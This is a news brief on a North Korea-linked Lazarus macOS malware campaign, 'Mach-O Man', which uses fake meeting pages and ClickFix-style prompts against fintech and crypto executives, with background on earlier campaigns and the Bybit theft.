Lazarus targets fintech execs

North Korea-linked Lazarus operators are using a new macOS malware campaign to target fintech and crypto executives through fake business meetings. (coindesk.com) Researchers and security firms identified the campaign this week as “Mach-O Man,” a toolkit built around native Mac binaries and delivered through ClickFix-style prompts that trick victims into running commands themselves. (any.run) The lures arrive over Telegram and impersonate routine work messages, often from compromised accounts, before sending targets to fake Zoom, Microsoft Teams or Google Meet pages. Those pages claim there is an audio or camera problem and instruct the victim to paste a terminal command into macOS. (any.run; bleepingcomputer.com) The malware is aimed at credentials, browser sessions and macOS Keychain data, which can hand attackers access to internal systems and financial accounts. ANY.RUN said the stolen data is exfiltrated through Telegram, a channel many companies already allow. (any.run) Mac malware matters here because many crypto and fintech firms rely on Apple laptops for executives, developers and deal teams. Google’s Mandiant said a separate North Korea-linked intrusion at a fintech company in February 2026 used seven distinct macOS malware families after a similar fake-meeting setup. (bleepingcomputer.com) The tradecraft is also part of a broader shift in Lazarus social engineering. Sekoia found that by February 2025 the group had expanded its “Contagious Interview” operations from developers to nontechnical staff in centralized finance, including business developers and marketing managers. (bleepingcomputer.com) North Korean operators have been pushing Mac-focused crypto intrusions for at least the past two years. SentinelOne’s November 2024 “Hidden Risk” report tied BlueNoroff, a Lazarus subgroup, to phishing emails and fake PDF apps aimed at Web3, crypto, fintech and investment firms. (therecord.media) U.S. officials have tied Lazarus to some of the industry’s biggest thefts. The Federal Bureau of Investigation said on February 26, 2025 that North Korea was responsible for the theft of about $1.5 billion in virtual assets from Bybit. (ic3.gov) That makes a fake meeting link more than a phishing nuisance for the companies being targeted now. In this campaign, one pasted command on a Mac can become a path into wallets, cloud systems and executive accounts. (any.run; ic3.gov)